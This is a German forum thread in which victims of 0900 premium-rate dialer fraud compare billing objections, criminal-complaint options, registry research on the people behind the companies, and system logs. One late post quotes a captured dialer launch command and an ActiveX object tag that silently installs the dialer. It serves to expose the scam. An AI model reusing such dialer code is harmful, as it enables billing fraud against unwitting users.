090090000263 oder auch Matlock - ermitteln Sie (Teil 1)

Status
Für weitere Antworten geschlossen.
@ eb-victim

was Du stellen solltest, ist eine Strafanzeige (Strafantrag muß zusätzlich gestellt werden nur bei solchen Delikten, die nicht von Amts wegen verfolgt werden, - was hier, Betrug etc., wohl nicht vorliegt).

Von Strafanzeige per Internet wurde hier einmal abgeraten, da das, obwohl zulässig, keinen so guten "Eindruck" macht .... Und das ist wohl das Wichtigste: daß es gut und glaubwürdig präsentiert wird. Dazu gehört vor allem a) den "Anfangsverdacht" möglichst klar und nachvollziehbar darstellen, b) darauf verweisen, daß an der Ermittlung ein öffentliches Interesse besteht. - Ich glaube, daß das umfangreiche Material, das Du gesammelt hast, hier eine gute Grundlage darstellt.

PS: @ TSCoreNinja
ich glaube Du meinst nicht neg. Feststellungsklage (das kann nur jeder für den eigenen zivilrechtlichen Fall machen, und das haben die beiden ja schon), - sondern auch die Strafanzeige, - und da könnte das Video tatsächlich ein guter Beleg sein!
 
cj schrieb:
Schade eigentlich, aber die Firma, die das Kundenlogin von EB managt, ist ja sowas von langweilig... Da lohnt nicht einmal ein Briefkastenbesuch ...
Findest Du? www.gbi.de sagt anderes. Suche mal in der Schnellsuche nach derem vollen Namen
9.11.03 Deutsche Telekom AG
Jahresabschluss: 2002
Bundesanzeiger Jahresabschlüsse, Bilanzen; 32000 Worte; 18.00 EUR

Ob da wohl eine Beteiligung der DT drin ist?
 
Qoppa schrieb:
ich glaube Du meinst nicht neg. Feststellungsklage (das kann nur jeder für den eigenen zivilrechtlichen Fall machen, und das haben die beiden ja schon), - sondern auch die Strafanzeige, - und da könnte das Video tatsächlich ein guter Beleg sein!
Nein, zumindest nicht nur! Wenn ein Jurist eine negative Feststellungsklage gegen die Forderungen zivilrechtlich durchkaempft, hat der rosa Riese bei den anderen Opfern Argumentationsprobleme!
 
TSCoreNinja schrieb:
cj schrieb:
Schade eigentlich, aber die Firma, die das Kundenlogin von EB managt, ist ja sowas von langweilig... Da lohnt nicht einmal ein Briefkastenbesuch ...
Findest Du? www.gbi.de sagt anderes. Suche mal in der Schnellsuche nach derem vollen Namen
9.11.03 Deutsche Telekom AG
Jahresabschluss: 2002
Bundesanzeiger Jahresabschlüsse, Bilanzen; 32000 Worte; 18.00 EUR

Ob da wohl eine Beteiligung der DT drin ist?

Ich wollte ja nur mal ein kleines Winkchen in diese Richtung hier positioniert haben... Vernetzungen zu finden, das traue ich mir zu, nur mit der Bewertung liege ich wohl schon seit knapp 300 Beiträgen auf ewig-rookie-level ;)
 
Re: Matlock Business Cooperations

TSCoreNinja schrieb:
Intermedex Holding - Managing Director - Gibts diesen Mann tatsaechlich, oder ist es ein Phantom?

Er gibt bzw. gab jedenfalls verschiedene Adressen und Staatsangehoerigkeiten an:

- Florinis Street 8, apartm. 15, Nicosia - 1065, Cypern
- des USA, à Nicosie, CYP ( = US-Buerger, wohnhaft in Nikosia, Zypern)
- cittadino britannico, in Nicosia (Cipro)
- de Grande-Bretagne, à Sark (Channel Islands), GBR
- consultant, demeurant a Appartement no. 15, Cleopatra Hotel,8,Florinis Street, Nicosia 1065, Chypre

Beteiligt ist bzw. war er u.a. an folgenden Gesellschaften:

CREA INVEST ApS ( Selskabsregistreringer )

INSKIP LLC, Albany, succursale de Genève
http://rc.geneve.ch/rc/consultation/consultationcomplete.asp?no_dossier_fed=CH-660-0193002-3

Siege pricipal: Albany, USA
Department of State de l'Etat de New York, USA, sous le n°200109250394 51
D. M. P., des USA, à Nicosie, CYP adm.
................, des USA, à Nicosie, CYP adm.
................, de Genève, à Confignon dir. succursale signature individuelle

MEGAFISH LIMITED, Londra, succursale di Lugano
http://www.hrati.ch/cgi-bin/fnrGet.cgi?fnr=5149025337&amt=514&lang=1&hrg_opt=11000&shab=0000000

DMP, cittadino britannico, in Nicosia (Cipro) einziges Mitglied
................, cittadino italiano, in Lugano Direktor der Zweigniederlassung Einzelunterschrift
................, da Manno, in Ponte Capriasca Direktor der Zweigniederlassung

Optimum Developments Limited, Londres, succursale de Genève
http://rc.geneve.ch/rc/consultation/consultationcomplete.asp?no_dossier_fed=CH-660-0278999-5

DMP., de Grande-Bretagne, à Sark Channel Islands, GBR adm.
....................., de Peseux, à Genève dir. succursale signature individuelle +

BIG STONE - MARBLE, GRANITE & EQUIPMENTS LIMITED, Londra, Succursale di Lugano
http://www.hrati.ch/cgi-bin/fnrGet.cgi?fnr=5149014980&amt=514&lang=1&hrg_opt=11000&shab=0000000

DMP, cittadino britannico, in Sark (Channel Islands) amministratore
....................., cittadina italiana, in Lugano rappresentante della succursale Einzelunterschrift

Finfoil L.L.C., New York, USA, Succursale di Lugano
http://www.hrati.ch/cgi-bin/fnrGet.cgi?fnr=5149009368&amt=514&lang=1&hrg_opt=11000&shab=0000000

ex****...................., cittadino britannico, in Le Friquet (Sark, Channel Islands) amministratore
ex****......................, cittadina britannica, in Le Friquet (Sark, Channel Islands) amministratrice
......................, da Thalwil e Malvaglia, in Massagno direttrice della succursale Einzelunterschrift
......................, cittadino britannico, in Nicosia (Cipro) Mitglied
DMP, cittadino britannico, in Nicosia (Cipro) Mitglied

gal.
 
Anonymous schrieb:
hrachka schrieb:
klatsche schrieb:
Vielleicht sollte man ja mal in anbetracht des schönen Wetters (zumindest
in Hessen,wenn ich grad mal so aus dem Fenster schaue) auf dem Firmen
Parplatz in Eggebeck mal ein Barbecue veranstalten zum dem der
"ehrenwerte" Herr Jens M... auch rechtherzlich eingeladen ist. um sich
mal, von den Kosten abgesehen auch für die viele ARBEIT die er uns beschert
zu bedanken(in anbetracht der hohen ARBEITSLOSIGKEIT in diesem Lande müssten wir IHM eigentlich DANKBAR sein oder???? :wall:

warum den nicht? Gute Idee

warum ? weil selbst ich als Betroffener mich mittlerweile fragen muss, auf welcher Seite sich iegentlich die Kriminellen stehen...hab hier ja leider schon einiges lesen müssen, von Bomben auf Eggebeck usw...

Wenn das mein Forum wäre würde ich hier mal durchkehren und aufräumen.

Hey du GAST

Die Wörter "Ironie" und "Joke" sind wahrscheinlich Fremdwörter für DICH

Und fall DU in meinem Posting kriminelle Tendenzen siehst ist das dein
Problem.
Ich dachte da eigentlich da eigentlich mehr an ein Barbecue mit Steaks und Bier ... :holy:
 
klatsche schrieb:
Und fall DU in meinem Posting kriminelle Tendenzen siehst ist das dein
Problem.
Ich dachte da eigentlich da eigentlich mehr an ein Barbecue mit Steaks und Bier ... :holy:

Hmmm du solltest zur Sicherheit aber noch schreiben, was für Steaks das sind, nicht das noch jemand denkt, du willst Ripsteaks von einem bestimmten Herren nutzen :holy: :D :lol:
 
Re: Stammtischparolen

Ernst-Helmut schrieb:
Hallo Moderators, was habt Ihr eigentlich für Möglichkeiten, auf Sachlichkeit hinzuwirken???
1 Bitte an alle Beteiligten: keine Stammtischparolen! Oder, wenn´s sein muss: wie wärs mit dem Forum "Off-Topics"?
Ernst-Helmut

High Ernst Helmut,

vestehst wohl kein Spass ????

@ Ben Tigger

Ich meine natürlich die guten T-Bone Steaks vom Ald....

aber zur Not tut`s auch Fisch.(gibts ja genug da oben im Norden) :splat:

gruß
Klatsche
 
nachdem hier ausführlich über die verschiedenen Möglichkeiten von Gartenfesten geplaudert wurde
bitte ich die Beteiligten wieder zum Thema des Threads zurückzukehren. Für die Betroffenen
ist das Ganze weniger lustig

tf
 
Ironie, Jokes, Stammtischparolen, Barbecues, Fishbones, ...

Technofreak: DANKE!!!
Es ist mittlerweile wirklich mühsam, Inhalte vom allgemeinen Unterhaltungsprogramm zu sortieren, wir haben jetzt 33 Seiten. Alle konstruktiven & anscheinend fundierten juristischen und IT-Infos zu erfassen, benötigt täglich schon ausreichend Zeitbedarf, also noch1mal die Bitte an alle Beteiligten & Betroffenen & Wissenden: Fakten, Fakten, ...
Schönen Dank
Ernst-Helmut

technofreak schrieb:
nachdem hier ausführlich über die verschiedenen Möglichkeiten von Gartenfesten geplaudert wurde
bitte ich die Beteiligten wieder zum Thema des Threads zurückzukehren. Für die Betroffenen
ist das Ganze weniger lustig

tf
 
Bestandsaufnahme&Termine: 8 Wochen Einspruchsfrist bei D

Huhu Ihr alle:

Wie wärs mit einer zusammenfassenden Bestandsaufnahme?

z.B.:
  • Anzahl Betroffene
    Höhe der durch Matlock abgezockten Beträge
    Erfahrungen mit Rückforderungen, Zahlungsverweigerungen, etc.
    Kontakte zu RegTP, DTAG, Matlock, Belize, ...
    Stand der Ermittlungen bei Einspruchsverfahren
    Staatsanwaltschaft, Polizei, Gerichte, ...
    Verbraucherzentrale?
    Renate Künast, Verbraucher(schutz)ministerium?
    ...

Habe gestern mit Telekom telefoniert, lt. Aussage eines DTAG-Mitarbeiters habe ich beste Chancen, meine 29,95 € behalten zu dürfen (ich habe diesen Betrag über meine Bank zurückgefordert, habe 1 Einzugsermächtigung für die Telefonrg.), allerdings hatte mein Gesprächspartner keine konkreten Infos über unsere Geschichte.

Für 1 Einspruch benötigt die DTAG 1 post-schriftliches Schreiben, incl. Details wie "Diensteanbieter", Einwahlnr., Datum, ...
Ich denke, der Einzelverbindungsnachweis, so man ihn glücklicherweise hat, ist hierfür völlig ausreichend, oder???

Bitte Termine beachten: für 1 schriftlichen Einwand räumt uns die DTAG 8 Wochen ab Rechnungsdatum ein!!!

Ernst-Helmut
 
@ Ernst-Helmut

Ein bisschen Auflockerung kann doch nicht schaden oder ???

jetzt aber mal im Ernst.

Du hast in deinem letzen Posting geschrieben bezügl. des Einspruchs

als Postschriftliches Einschreiben zu übersenden.

Ich habe denen einfach den EVN mit eingerahmter Position gefaxt
und vermerkt das ich einen Einspruch gegen diese Position erhebe.

Die T-Com hat mir meinen Einspruch ca. 4Tage danach schriftlich
bestätigt.

Das müßte doch dann als Einspruchsbeweis ausreichen ?? oder??

Zu deiner angeregten Bestandsaufnahme - gute Idee!!!-

aber wie könnte man diese realisieren ??

Wäre auch bereit daran mitzuwirken.

Nach einer Bestandsaufnahme hätte man vielleicht auch etwas handfestere
Argumente der T-com gegenüber falls Sie einen Einspruch ablehnen und
mit der Masche kämen bei Easy Billings wäre alles sooooo in Ordnung.

gruß

klatsche
 
sorry für die mehrfach Postings

habe Probleme mit der Verbindung und dachte das erste wäre nicht
durchgegangen.


Ich hab das eine der identischen Doppelpostings dann mal gelöscht BT/Moderator
 
Re: Dialermaffia aus Eggebeck

blumenwiese23 schrieb:
klatsche schrieb:
-Wenn sich herausstellt das diese Dialergruppe ...-423 nicht rechtskonform
ist, was nach vielen Aussagen im Forum sehr naheliegt.
Dürfe das mit nicht gemachten Dialersichrungskopie eigentlich auch kein
Problem sein.???

ich habe auch die ...423 auf meinem evn. die regtp suchmaschine spuckt drei endnummern mit drei versionen und den jeweiligen registrierdaten aus. das problem ist, man kann nicht nachvollziehen, welche nummer es war, oder ob es noch mehr nicht-registrierte nummern gibt. die zwei ersten versionen sind sicher nicht rechtskonform, da der hash-wert nicht stimmt. die version vom 04.02 hat einen registrierfähigen hash-wert, ist also auch rechtskonform registriert. auch das selbst-termenieren der dialer ist erlaubt.
ich hab auch keine dialer gesichert. hab aber heut von der regtp grünes licht bekommen, dass bei mir kein zahlungsanspruch gegn. der telekom existiert. (das hab ich auch der telekom geschrieben. hoffe die begreifen das auch). meine einwahlen waren allerdings auch schon im januar.

gruss

da ich ein paar pns bekommen habe, will ich den sachverhalt hier ein bisschen näher erklären. wichtig, es gibt KEIN aktenzeichen von der regtp.
anruf bei der regtp, dort habe ich die nummern durchgegeben und man hat mich aufgeklärt. ich habe folgende nummern auf der t-rechnung: 09009000423 und 090090000264. (wie schon in ca. 32 postings erwähnt)
bei beiden nummern gibt es jeweils drei verschiedene nummern-endungen. die registrierungsdaten sind bei den drei nummern identisch.
09.12.2003, 17.12.2003 und 04.02.2004. meine einwahlen waren im januar. jeweils die ersten beiden nummern haben als hash-wert nur eine 128-bit verschlüsselung d.h. der hash-wert zeigt nur 32 zeichen an => nicht rechtskonform registriert!! :lol:
die beiden nummern mit dem registrierungsdatum 04.02.2004 gewährleisten eine rechtskonforme 160-bit verschlüsselung d.h. der hash-wert zeigt 40 zeichen an. => meine einwahl war aber im januar 8) .genau diesen sachverhalt habe ich der telekom am 11.03.04 schriftlich geschildert und warte noch auf eine antwort.

dieses vorgehen ist kein masterplan, und passt eben auf oben genannte nummern und das einwahldatum!!
wenn die einwahl der geschädigten VOR dem 04.02.2004 unter oben genannte nummern stattgefunden hat, sehe ICH allgemein keine zahlungspflicht.

wer der regtp eine e-mail geschrieben hat, kann lang warten. besser
anrufen.
 
Rigo schrieb:
Hallo Leute,also mich hat es letzten Monat auch erwischt.
Werde meine Rechnung der T zurückbuchen und nur den Unbestrittenen Betrag anweisen.
Jetzt habe ich aber soviel hier gelesen,und versuchte auch die diversen Schreiben die ich aufsetzen muss zusammenzusuchen.
Nur irgendwie geht keiner der Links,die auf irgend eine PDF zeigen sollen.

Mal anderst gefragt,jemand der hier erfolgreich einspruch einlegte.
Kann derjenige vielleicht mal genau zusamenstellen was man alles braucht z.B.:
Einzelverbindungsnachweis (Bekommt man soundso)
Anfrage an Regulierungsbehörde,bzw. beschwerde.
Rückbuchung usw.

evtl so als Tutorial,damit geschädigte hier einen Leitfaden haben den man überblicken kann.

Wäre sehr Dankbar,und würde auch dazu beitragen wenn es gewünscht ist.

Falls es diesen schon gibt,sorry.
Dann habe ich den wohl in den letzten 4 std. hier lesen überflogen.

P.s: Bei mir ist es allem anschein nach auch Easybilling und wurde über die TK-Anlage verbunden.Der Betrag ist 25,82 PRS T-Com.
Aussage der T ist das es sich hierbei um einen Rechtmässigen Dialer der bei der RegTP gelistet ist handelt.
Hier habe ich aber nie eine Verbindung bestätigt in der mir erklärt wurde das sie 25€ kostet.
Würde ich auch nie tun.
Der von der T kam mir dann gleich mit,Sie haben ja auch eine 0190 verbindung.Zweifeln sie diese auch an ?
Als ich ihm sagte das ich diese 30.-€ der 0190 nicht anzweifeln tue da ich mit einem Support Tel. der mir das aber vorher ansagte,und ich die Zeit mitschrieb um diese mit der T-Rechnung zu vergleichen und deis übereinstimmt.Meinte er nur,dann werden sie diesen Dialer wohl auch verwendet haben.
Nicht wirklich Hilfsbereit der Mensch,aber das es sich um Easybilling handelt konnte er mir sofort sagen.


Naja,nichts destotrotz.
Was ich brauche sind Informationen,wem ich alles ein Schreiben und Fax wohin schicken soll.
Bei der T-Rechnung habe ich bis jetzt raus,das ich diese Überweisen soll mit vermerk ohne PRS bezahlung !

Aber was fehlt mir noch alles ?
Würde mal sagen alles oder ?

mfg Rigo

Ich habe auch eine Rechnung über 25,8190 Euro bekommen. Nach Rücksprache mit einer sehr netten Dame bei der Telecom (Frau Reuswich, Tel. 08003301030 kostenlos) bin ich so mit ihr verblieben, daß sie den Betrag von 25,82 inkl. Mwst. wieder zurücküberweist und ich für die nächste Zeit vom Abbuchungsverfahren ausgeschlossen werden. Meine nächsten Rechnungen muß ich nun selbst überweisen. Mir werden dann evt. 2 Mahnungen zugeschickt von der Telecom die den nicht bezahlten Betrag von 25,82 anmahnen wollen, die solle ich aber nicht beachten. dann soll ich in 6 Wochen zurückfragen, ob sich der Fall erledigt hätte. Die Telefonnummer die ich gewählt haben soll ist eine 090090000576 von einem Richter, Andreas Fa. Ikterus. Ich möchte alle bitten, sich gegen diese Rechnung zu wehren und auf keinen Fall abwarten oder sich mit diesen Firmen in Verbindung zu setzen. Die erzählen einem sonst was. Soll doch die Telecom versuchen, ihr Geld von uns wieder zu bekommen und nicht umgekehrt, vielleicht wird dann solchen Betrügern endlich mal das Handwerk gelegt. Wenn es hart auf Hart kommt kann man immer noch bezahlen, aber bei höheren Beträgen sollte man sowieso sofort den Rechtsschutz (falls man einen hat) einschalten. Gruss Monika Roth.
 
Der Benutzer "1-140-49-3-090090000606@dcon"...

Der Benutzer "1-140-49-3-090090000606@dcon" hat eine Verbindung mit "exDialer" hergestellt, unter Verwendung des Geräts "ISDN2-1".


das steht bei mir in der verwaltung des windows systems.

sollte ich möglichst schnell alles unternehmen dass die telekom bei der nächsten rechnung (in der der entsprechende betrag abgebucht werden soll) das nicht abbuchen kann? oder kann man das nicht widerrufen?

was soll ich da alles machen?

mfg profiler
 
auffällig

also, ich hab noch mal nachgesehen und mit schrecken festgestellt, dass sich dieser dialer insgesamt 2 mal bei mir eingewählt hat, aber jedes mal wenn esunter der systemverwaltung heißt:

Der Benutzer "1-140-49-3-090090000606@dcon" hat eine Verbindung mit "exDialer" hergestellt, unter Verwendung des Geräts "ISDN2-1".

kommt danach der eintrag:

Der Server konnte zu der Transportschicht \Device\NetBT_Tcpip_{178F643F-4ACA-4E8D-87FA-D1210DD0AD91} keine Verbindung herstellen.

und gleich danach kommt die meldung:

Die Verbindung mit "exDialer", hergestellt durch den Benutzer "1-140-49-3-090090000606@dcon" unter Verwendung des Geräts "ISDN2-1", wurde getrennt.

und beide mal liegen zwischen dem erstellungsdatum der "herstellund der verbinfung" und der "beendigung" 12 sekunden. Kann das eventuell heißen dass der dialer versucht hat sich einzuwählen, aber sich nicht eingewählt hat, da er den server nicht erreichen konnte?

mfg profiler
 
Strafanzeige oder -antrag?

Qoppa schrieb:
@ eb-victim
was Du stellen solltest, ist eine Strafanzeige (Strafantrag muß zusätzlich gestellt werden nur bei solchen Delikten, die nicht von Amts wegen verfolgt werden, - was hier, Betrug etc., wohl nicht vorliegt).
@ Qoppa
Ich dachte an Strafantrag u. a. wg. Verstoss gg. §§ 303a,303b StGB.
Für die "erfolgreiche" Anwahl eines Auto-Dialers habe ich keinen hieb- und stichfesten Beweis.
Nachweisen kann ich aber, dass mir von einer Matlock-Site eine Datei WMPLAYER.EXE untergeschoben wurde, die automatisch wählen wollte (Modemkabel war herausgezogen, also kein finanzieller Schaden).
Beweisen kann ich versuchten Betrug.
Als juristischer Laie dachte ich, ein Antrag sei besser, falls ein öffentliches Interesse verneint würde.

Lohnt sich ein Zusatz wie "und anderer in frage kommender Delikte"?
 
Haldex Matlock Zusammenarbeit?

Software - Interoperabilitaet?
Gesichtet wurde folgender Matlock Dialeraufruf
Code:
wsh.Run("c:\webdial.exe -cid=DE -ph=T0190833959000 -url=http://members.$MATLOCKURL.net/galleries/ -fburl=http://connect.$HALDEXURL.com/connect.php?did=od-teen4 -nospk=true -web=yes");

Wofuer steht zum Teufel -fburl?
Naja, ein paar Auszuege aus der Seite:
Code:
function StartIt() { self.location.replace("download.php?did=od-teen4&country=de
&"); }

<OBJECT ONERROR="ErrorHandler();" ID="PlugInObject" CLASSID="CLSID:02C20140-76F8
-4763-83D5-B660107B7A90" WIDTH="1" HEIGHT="1" CODEBASE="/cax.cab">
Cab enthaelt ein ActiveX Object(?) Ole32ws.dll +inf, und download.php den obligatorischen Dialer....

Quelle: Ein italienisches WebLog

BTW, Dialerlinks sind aktiv und vermutlich gefaehrlich...
 
Re: Haldex Matlock Zusammenarbeit?

TSCoreNinja schrieb:
Software - Interoperabilitaet?
Gesichtet wurde folgender Matlock Dialeraufruf
Wofuer steht zum Teufel -fburl?
Ich vermute: Fallback-URL
Vermutlich wird diese Seite angezeigt, falls die Zielseite nicht mehr existiert oder falls die Zielseite geschlossen wird.
Für jedes Fenster, das man schließt, geht ein neues auf ...
 
Status
Für weitere Antworten geschlossen.
Zurück
Oben